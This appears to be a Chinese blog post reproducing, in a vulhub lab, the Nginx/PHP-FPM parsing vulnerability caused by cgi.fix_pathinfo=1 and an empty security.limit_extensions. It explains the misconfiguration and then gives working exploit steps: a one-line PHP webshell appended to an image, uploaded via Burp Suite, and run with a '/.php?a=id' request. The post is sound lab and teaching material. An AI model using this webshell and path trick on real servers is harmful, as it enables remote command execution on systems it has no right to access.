Nginx 解析漏洞 漏洞复现

Posted 2021-10-23 rpsate

前言

该漏洞与nginx、php版本无关，属于用户配置不当造成的解析漏洞。

环境搭建

漏洞环境使用vulhub搭建，漏洞目录为 vulhub/nginx/nginx_parsing_vulnerability

在漏洞目录中执行以下命令即可构建漏洞环境。

docker-compose up -d

原理分析

首先来看不当配置：

# php.ini
cgi.fix_pathinfo=1
# php-fpm.conf
security.limit_extensions为空

我们首先来看看cgi.fix_pathinfo作用到底是什么！我举一个例子可能大家就会明白这个参数的作用了：

假如我们访问 http://ip地址/a.php/index/admin会发生什么？（a.php是存在的文件，a.php/index/admin不存在）

首先来看cgi.fix_pathinfo=0的情况，服务器会把http://ip地址/a.php/index/admin当成一个完整的路径来访问，但是a.php/index/admin是不存在的，所以服务器会返回404错误。

再来看cgi.fix_pathinfo=1的情况，这种情况服务器就比较智能了，服务器会自动判断哪个是真正的文件，把真正的文件交给php-cgi来解析。同时把文件的后面的数据保存在环境变量$_SERVER['PATH_INFO']中。

我们来测试一下，将下面代码保存在a.php中，并将a.php放入本地搭建好的php环境中，然后访问 http://localhost/a.php/index/admin

<?php
var_dump($_SERVER['PATH_INFO']);
?>

我们看到文件名后的 /index/admin确实传给了环境变量 $_SERVER['PATH_INFO']。

http://域名/项目名/入口文件/模块名/方法名/键1/值1/键2/值2属于URL访问模式中的PATHINFO 模式，很多框架采用的URL访问模式就是这种，例如ThinkPHP。这种访问模式必须开启cgi.fix_pathinfo，同时php配置的默认情况也是cgi.fix_pathinfo=1。

下面再来了解security.limit_extensions的作用

这个参数的作用就是使php-cgi只能解析特定后缀的文件，为空时就能解析所有文件。

再来看到nginx的关键配置

location ~ \\.php$ {
    include        fastcgi_params;

    fastcgi_pass   127.0.0.1:9000;
    fastcgi_index  index.php;
    fastcgi_param  SCRIPT_FILENAME  /var/www/html$fastcgi_script_name;
    fastcgi_param  DOCUMENT_ROOT /var/www/html;
}

当我们访问 http://IP地址/a.jpg/.php时，该URL是可以匹配上面的正则表达式 \\.php$，但是在php-cgi解析时会提取真正的文件名http://IP地址/a.jpg，并对其解析。这样就成功的执行了jpg文件中的php代码。

漏洞复现

靶场中的上传图片功能会检测图片里的特征码，只有真正的图片才能上传成功，所以必须准备一张真正的图片。

开启burpsuite监听，抓取上传图片的数据。

然后在图片数据的末尾写上一句话木马：

<?php system($_GET['a']);?>

点击 burpsuite上的Forward按钮进行提交，这时来到浏览器，看到图片木马已经成功上传。

访问图片木马，并在图片马后面加上 /.php和参数执行命令。

http://192.168.119.131/uploadfiles/394659692a460258b45a99f1424ea357.jpg/.php?a=id

这时发现木马执行成功！

参考文献

[1] https://www.laruence.com/2010/05/20/1495.html，Nginx + PHP CGI的一个可能的安全漏洞

[2] https://blog.csdn.net/zstxt1989/article/details/9310121，ThinkPHP中URL解析原理，以及URL路由使用教程！